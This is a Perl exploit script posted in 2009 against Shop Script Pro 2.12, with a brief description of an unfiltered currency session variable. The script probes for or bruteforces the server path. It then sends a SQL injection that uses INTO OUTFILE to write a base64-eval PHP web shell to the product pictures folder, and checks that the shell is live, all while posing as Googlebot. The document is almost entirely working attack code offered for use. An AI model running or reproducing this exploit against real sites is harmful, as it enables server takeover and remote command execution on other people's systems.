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Posted on 09 June 2009

#!/usr/bin/perl =about VENDOR Shop Script Pro 2.12 (maybe other versions vulnerable too) http://www.shop-script.com/ AUTHOR discovered & written by Ams ax330d [doggy] gmail [dot] com http://www.0x416d73.name/ VULN. DESCRIPTION Look in index.php at line 101. Variable $current_currency is set from $_SESSION["current_currency"] which is set in "/core_functions/currency_functions.php" in function currSetCurrentCurrency() at line 17 via "/includes/change_currency.php" at line 13. This variable is not filtered. EXPLOIT WORK First exploit looks for file "linkpoint.php" in hope to find full server path. If not found, then it bruteforces those paths, otherwise will use found one. Also at this time session is being set. Exploit then sends POST request with SQL-Injection that tries to upload tiny shell. And finally checks for shell. REQUIREMENTS 1. MySQL must have rights to write to file 2. Full server path should be known 3. magic_quotes_gpc=off =cut use strict; use warnings; use LWP::UserAgent; use HTTP::Cookies; use HTTP::Request::Common; &Banner; $| = 1; my $expl_url = shift or &Usage; my $serv_path = shift || ''; my $def_shell = '/products_pictures/pic.php'; my $shell = q(<?php eval(base64_decode(base64_decode($_GET['cmd'])));?>); my $sql_shell = join ',', map { ord } split //, $shell; my $cookie = HTTP::Cookies->new; my $spider = LWP::UserAgent->new; push @{ $spider->requests_redirectable }, 'POST'; $spider->requests_redirectable(); $spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); my @paths = qw( /var/www/htdocs /var/www/localhost/htdocs /var/www /var/wwww/hosting /var/www/html /var/www/vhosts /home/www /home/httpd/vhosts /usr/local/apache/htdocs /www/htdocs /srv/www/htdocs ); Exploit( $expl_url ); sub Exploit { $_ = shift; print " Exploiting: $_"; chomp( $serv_path ); my $injection; my ($prot , $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:?([^#]*))?(?:#(.*))?}; $prot ||= 'http'; # Trying to get /linkpoint.php to get server path my $req = POST "$prot://$host$path/linkpoint.php", Content_Type => 'form-data', Content => [ oid => 1, chargetotal => 1 ]; my $res = $spider->request( $req ); $cookie->extract_cookies( $res ); $spider->cookie_jar( $cookie ); if ($serv_path ne '-b') { $serv_path = $res->content =~ m#ins+<b>(.*?)/linkpoint.php</b>s+on# ? $1 : $serv_path; } $serv_path ||= '-b'; if ( $serv_path ne '-b' ) { chomp( $serv_path ); print " Found path: $serv_path"; $injection = "1' UNION SELECT null,null,null,null,CHAR($sql_shell) INTO OUTFILE '$serv_path$def_shell' -- "; my $req = POST "$prot://$host$path/index.php", Content_Type => 'form-data', Content => [ current_currency => $injection]; $res = $spider->request( $req ); } else { # Bruteforcing path print " Starting bruteforce... "; for $serv_path ( @paths ) { chomp( $serv_path ); print " Trying path: $serv_path$path$def_shell "; $cookie->extract_cookies( $res ); $spider->cookie_jar( $cookie ); $cookie->clear(); $injection = "1' UNION SELECT null,null,null,null,CHAR($sql_shell) INTO OUTFILE '$serv_path$path$def_shell' -- "; my $req = POST "$prot://$host$path/index.php", Content_Type => 'form-data', Content => [ current_currency => $injection ]; $res = $spider->request( $req ); } } # Checking for shell presence $req = GET "$prot://$host$path$def_shell"; $res = $spider->request( $req ); print " Checking: http://$host$path$def_shell"; if ( $res->status_line =~ /200s+OK/ ) { print " Exploited! "; } else { print " Exploiting failed. "; } } sub Usage { print " Usage: $0 http://site.com [-b|full/server/path] Example: $0 http://localhost/ /var/www/htdocs $0 http://localhost/ -b $0 http://localhost/ "; exit; } sub Banner { print " ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Shop Script Pro 2.12 Perl exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "; }